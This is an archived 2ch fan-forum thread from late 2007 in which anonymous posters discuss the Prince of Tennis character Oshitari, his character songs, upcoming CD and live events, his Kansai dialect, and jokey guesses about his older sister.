168 :名無しかわいいよ名無し:2007/11/19(月) 11:19:58 ID:qZnFSOXk
>>167
( ○д○)おおきにな〜

眼鏡'sレコーディング終わったみたいだね
発売が楽しみだ!!

169 :名無しかわいいよ名無し:2007/11/19(月) 18:35:25 ID:KHk8dbcM
これでいいンすか?((汗
しつこくてスマソ

170 :名無しかわいいよ名無し:2007/11/19(月) 23:51:13 ID:mZoQOHTq
>>169
( 〇д〇)自分>>157か?よくできました

でもここは忍足について語るスレだからそういう質問はスレ違いってやつだよ
スレ違い発言や2ch初心者丸出し発言は通常叩かれるものだから気を付けて
2ch内でも「初心者の質問」って掲示板があるから今後そういった質問するならそちらへドゾ

171 :名無しかわいいよ名無し:2007/11/20(火) 03:57:44 ID:EI+fKRcg
゜     ゜     ゜        ゜       
    ゜             ゜         ゜      ゜
 ゜     ゜     ゜         ゜          ゜
   ゜       CDはクリスマス前の発売やでー。     ゜   ゜
  ゜   ゜     ホワイトクリスマスになるとええなぁ。゜   ゜  
゜(つ○д○)つ手袋 ゜ 寒くなってきたから風邪引かない様に気ぃつけや〜。  ゜                 

172 :名無しかわいいよ名無し:2007/11/20(火) 08:02:17 ID:7MX/fniA
>>171
大阪弁わからない人が無理して書かなくていいよ

173 :名無しかわいいよ名無し:2007/11/20(火) 17:58:37 ID:Uf7Vrg4h
忍足の関西弁が怪しいのは公式だからいいんだよww

174 :名無しかわいいよ名無し:2007/11/20(火) 18:04:00 ID:DqGhggP/
関西弁萌え〜〜○眼鏡萌ぇ〜〜〜〜

175 :名無しかわいいよ名無し:2007/11/21(水) 03:56:55 ID:wcvMbRjj
この時期にて〜つなご聴いてるとほんわかしてくる。

176 :名無しかわいいよ名無し:2007/11/21(水) 11:05:40 ID:DPZtCHM6
気持ちはすごくありがたいんだけど、dat落ちの基準って最終書き込み時間だから、
保守はsageでかまわないみたい(○д○)

177 :名無しかわいいよ名無し:2007/11/21(水) 13:26:07 ID:2vfegE60
>>175
冬だからね〜〜忍足に萌ぇなヤツにはたまらん

178 :名無しかわいいよ名無し:2007/11/23(金) 01:01:45 ID:FFdBV53c
そういえば100曲マラソン木内さん参加されるそうですね。
嬉しい!!!!
一体何の曲を歌ってくださるのでしょうかwwww
手塚部長がいないので眼鏡'sは無理そうですが……

179 :名無しかわいいよ名無し:2007/11/23(金) 01:35:03 ID:NbSS5/5N
100曲マラソン行きたいなぁ
生バレキスを是非・・・
出来ればめばちこと銀の剣も聞きたい

180 :名無しかわいいよ名無し:2007/11/23(金) 01:49:58 ID:WC+k+Lp/
A気持も是非!バレキスはあの吐息を生で聞いたらさぶいぼでそうw

181 :名無しかわいいよ名無し:2007/11/23(金) 19:45:27 ID:XgSyATBG
カタルシス聴きたいな

182 :名無しかわいいよ名無し:2007/11/25(日) 04:14:10 ID:7EbJc9jW
生で吐息聞くのかwww

183 :名無しかわいいよ名無し:2007/11/25(日) 09:51:01 ID:pMEGLHmH
吐息にエコーかかったらどうするよ

184 :名無しかわいいよ名無し:2007/11/26(月) 01:51:21 ID:+jkMyaq8
会場のみなさんが心配だwww

185 :名無しかわいいよ名無し:2007/11/26(月) 15:39:21 ID:6odyZz7Y
とりあえず目を瞑るよw

186 :名無しかわいいよ名無し:2007/11/26(月) 18:49:42 ID:fLQr1Zn+
>>185
瞳を閉〜じて〜♪

187 :名無しかわいいよ名無し:2007/11/27(火) 02:08:51 ID:We6FlYDB
アルバムで人気の曲ってなに?
やっぱめばちこ?

188 :名無しかわいいよ名無し:2007/11/27(火) 15:37:35 ID:XyZRKHM/
わからんけど銀の剣じゃないの
普通にかっこいい
ソロじゃないけどスパイラルも好きだ

189 :名無しかわいいよ名無し:2007/11/27(火) 23:30:16 ID:GQEsBdz7
めばちこ
A気持ち
crafty(ボサノババージョン)
は聴きたいな

190 :名無しかわいいよ名無し:2007/11/28(水) 02:23:10 ID:VxZZAMU3
craftyボサノバVERは忍足の魅力が発揮されすぎ

191 :名無しかわいいよ名無し:2007/11/28(水) 09:14:28 ID:FlmlLJ7/
全ての曲をBossa Novaバージョンにしてみたらどうなるんだろう

192 :名無しかわいいよ名無し:2007/11/28(水) 18:10:56 ID:6O00tEEk
>>191
忍足の無駄遣いになる

193 :名無しかわいいよ名無し:2007/11/29(木) 02:30:16 ID:Qko0OVlj
>>192
いやいや有効利用ですよ

194 :名無しかわいいよ名無し:2007/11/29(木) 10:27:04 ID:9naa5J7w
忍足の抜けるようなしゃべり方がいいよね

195 :名無しかわいいよ名無し:2007/11/30(金) 13:59:46 ID:nSafzZRR
忍足って、何となくムード歌謡が似合うイマゲ

ところで、忍足家の家族ってどんな人たちなんだろう?あの性格が形成されるような家庭が気になるw
姉さんとは年離れてるor年子あたりかの両極端っぽいと思ってる。特に理由はないが。

196 :名無しかわいいよ名無し:2007/12/01(土) 08:26:54 ID:CSEETy/j
>>195
姉さんについては恐れてるような態度とってたことあったよね
土器鯖だったかな

197 :名無しかわいいよ名無し:2007/12/01(土) 12:17:46 ID:708x+ZtL
元気で色々な意味で破壊的な姉
お淑やかだが怒ると笑顔で滅殺型姉
エロ姉

弟がのらりくらりとしてエロ声なせいで色々な恐姉が浮かぶ

198 :名無しかわいいよ名無し:2007/12/02(日) 02:00:16 ID:JoiBpOFJ
キツいお姉さんが何故か合うwww

199 :名無しかわいいよ名無し:2007/12/03(月) 04:12:39 ID:RB5i2Sw4
黒髪のクールビューティー希望

200 :名無しかわいいよ名無し:2007/12/04(火) 01:45:25 ID:c+qi6F55
姉さんもエロボイスと予想

201 :名無しかわいいよ名無し:2007/12/04(火) 08:15:03 ID:fJy27hBb
>>200
ネタ的には面白いけどそんな家族いやだぁぁぁ

202 :名無しかわいいよ名無し:2007/12/04(火) 08:39:16 ID:2asiNPFm
忍足は1年の時から丸眼鏡だったんだね


203 :名無しかわいいよ名無し:2007/12/04(火) 11:50:42 ID:t8dKMrET
今日は40.5発売日
忍足の新情報が載ってないかとwktk

204 :名無しかわいいよ名無し:2007/12/04(火) 12:52:20 ID:CpSa7v1x
40.5軽くバレ


出身小学校きたよ
あと書き下ろし漫画が評定ですた

205 :名無しかわいいよ名無し:2007/12/04(火) 13:55:50 ID:mfzrMkdD
あの続き
読みたいなぁWW

跡部と試合したのかな?

206 :名無しかわいいよ名無し:2007/12/04(火) 14:28:06 ID:uBy6MH3p
続き描いて欲しいな
読みたい

207 :名無しかわいいよ名無し:2007/12/04(火) 15:32:34 ID:uBy6MH3p
眼鏡’sの新曲タイトル
『踊りませんか?眼鏡’s』

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)